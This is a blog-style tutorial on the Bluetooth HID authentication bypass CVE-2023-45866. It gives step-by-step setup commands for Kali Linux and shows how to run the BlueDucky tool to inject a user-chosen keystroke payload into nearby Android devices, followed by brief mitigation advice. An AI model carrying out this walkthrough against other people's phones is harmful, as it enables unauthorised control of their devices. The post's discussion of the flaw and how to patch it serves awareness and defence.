How Hacker Hack Android Phone Using Bluetooth? CVE-2023-45866

Hi Hacker's Welcome Back My New Blog Post, in this post we will learn How Hacker Hack Your Phone Using Bluetooth, And How Bluetooth Vulnerability To Hack Android Devices. so without wasting your time let's start.

CVE-2023-45866 New Android Vulnerability

CVE-2023-45866 is a severe security flaw in Bluetooth, classified under "Improper Authentication" (CWE-287), and carrying a high CVSS score of 8.8. This critical vulnerability allows remote escalation of privileges without additional execution privileges or user interaction​​. In practical terms, it means an attacker could gain higher-level access to a device or network, similar to that of an authorized user, without needing any additional permissions or user interaction.

Impact on Operating System.

The CVE-2023-45866 Bluetooth flaw presents a significant threat to a range of widely-used operating systems, namely Android, Linux, Windows, macOS, and iOS. This wide-ranging impact makes it a critical concern for users and organizations alike, as these systems form the backbone of countless computing devices worldwide. The vulnerability's ability to cross-platform boundaries signifies a broad security risk.

Let's Test How Actually This Work.

The Discovery by Marc Newlin

The Great Marc Newlin, a software engineer at SkySafe, identified this years-old Bluetooth authentication bypass vulnerability. His findings revealed that the exploit could be executed from a Linux machine using a standard Bluetooth adapter, without the need for any special hardware. Newlin responsibly reported this flaw to major stakeholders, including Apple, Google, Canonical, and the Bluetooth Special Interest Group (SIG)​​

Interestingly, CVE-2023-45866 is not Newlin's first significant discovery in the realm of Bluetooth security. He previously identified a similar set of flaws in 2016, known as "MouseJack", which exploited keystroke-injection vulnerabilities in wireless mice and keyboards. Newlin's consistent contributions highlight his expertise and vigilance in the field of cybersecurity. Checkout GitHub.

Step.1: New 2024 Bluetooth Vulnerability

To Demonstrate, we will use a Repository inside this blog. the great Developer Opabinia Write This code. this repository is basically an implementation of this vulnerability, which is automatic, which helps you understand this bug.

Step.2: BlueDucky The New HID Attack.

First of all you have to download some important packages, tools, drivers inside your Kali Machine. these drivers will help to improve the scanning process and communications of your Bluetooth.

# update apt 

sudo apt-get update 

sudo apt-get -y upgrade

 # install dependencies from apt

 sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \ 

 git gcc python3-pip python3-setuptools \ 

 python3-pydbus 

 # install pybluez from source

 git clone https://github.com/pybluez/pybluez.git 

cd pybluez 

sudo python3 setup.py install 

 # build bdaddr from the bluez source 

cd ~/

 git clone --depth=1 https://github.com/bluez/bluez.git 

gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth 

sudo cp bdaddr /usr/local/bin/

after Packages and drivers is installed, you can now clone BlueDucky repositories inside your Kali Machine.

git clone https://github.com/pentestfunctions/BlueDucky

Step.3: How Android Hack Using Bluetooth

Now you have to enable your Bluetooth Service, so that it can scan your Bluetooth devices and show you the results of all the Bluetooth devices around you. For this you can copy the command below given.

sudo hciconfig hci0 up

Step.4: Hi, My Name is Keyboard CVE-2024-0230

now you can to come inside the BlueDucky directory. here you will get to see the python file and Payload.txt. inside the payload.txt file you have to paste the your ducky payload script, which you want to input on the target device, and then you can run this tool with python3 command.

python3 BlueDucky.py

When it run, it will automatically start scanning your Bluetooth and will show you the MAC address of all devices found nearby along with the device name. and now you can select device on which you want to perform attacks and bring it to attacking mode

and maybe when you run this tool. you are shown some kind of error that it is not working, then what to you have to do in this situation

Check Out Detail Video This Attack [Video]

You don't have to worry, you have to down your Bluetooth interface so that this tool can automatically enable the Bluetooth interface and Scan the devices.

sudo hcitool hci0 down

After powering down the Bluetooth device, you can now see the script starting again. it will automatically select your devices. whatever devices number you have given and after that automatically HID attack will be performed inside target device, which you have given inside the payload. and this is how vulnerability work, it can present all the HID input inside Target Android Device.

How To Mitigation

What do you have to do avoid this attack, First of all update your Android Devices. After updating, never keep Bluetooth on in Public Place, and you do not have to do Bluetooth paring or connect with unknown devices.

Note: I have Tested This vulnerability on My Android 13, But Still My Device Also Vulnerable.

Conclusion

CVE-2023-45866 underscores the ongoing challenges in securing wireless communication technologies. The broad impact of this vulnerability emphasizes the necessity of vigilant cybersecurity practices and timely application of security patches. It also showcases the crucial role of security researchers like Marc Newlin in identifying and reporting vulnerabilities, thus contributing significantly to the collective digital security.

I hope you have understood within this Blog post. How does Bluetooth Flow work, and How Hacker Hack Your Device Due to Bluetooth Vulnerability. I Hope You Enjoy Thanks :)

Check Out Detail Video This Attack [Video]